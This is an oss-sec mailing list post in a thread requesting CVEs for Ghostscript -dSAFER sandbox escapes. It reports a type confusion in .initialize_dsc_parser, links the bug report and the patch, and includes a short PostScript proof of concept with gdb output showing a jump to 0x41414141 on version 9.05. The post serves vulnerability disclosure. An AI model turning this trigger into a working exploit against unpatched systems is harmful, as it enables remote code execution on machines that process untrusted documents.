oss-sec mailing list archives
Re: CVE Request - multiple ghostscript -dSAFER sandbox problems
From: Tavis Ormandy <taviso () google com>
Date: Wed, 5 Oct 2016 13:12:19 -0700
On Wed, Oct 5, 2016 at 9:13 AM, Tavis Ormandy <taviso () google com> wrote:
bug: type confusion in .initialize_dsc_parser allows remote code execution id: http://bugs.ghostscript.com/show_bug.cgi?id=697190 repro: http://bugs.ghostscript.com/show_bug.cgi?id=697190#c0 patch: http://git.ghostscript.com/?p=ghostpdl.git;h=875a0095f37626a721c7ff57d606a0f95af03913
It was pointed out to me that my testcase doesn't work on the 9.0x versions, because it doesn't allow encoding 64-bit integers, but it's still exploitable. For example, something like this should jump to 0x41414141: $ cat test.ps %!PS [16#1 16#2 16#3 16#41414141 [16#4]] .initialize_dsc_parser $ gdb -q -ex r --args gs -dSAFER -f test.ps GPL Ghostscript 9.05 (2012-02-08) Copyright (C) 2010 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. Program received signal SIGSEGV, Segmentation fault. 0x0000000041414141 in ?? () Tavis.
Current thread:
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems, (continued)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Bob Friesenhahn (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Jakub Wilk (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Florian Weimer (Oct 05)
- Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Cedric Buissart (Oct 19)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 11)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems cve-assign (Oct 11)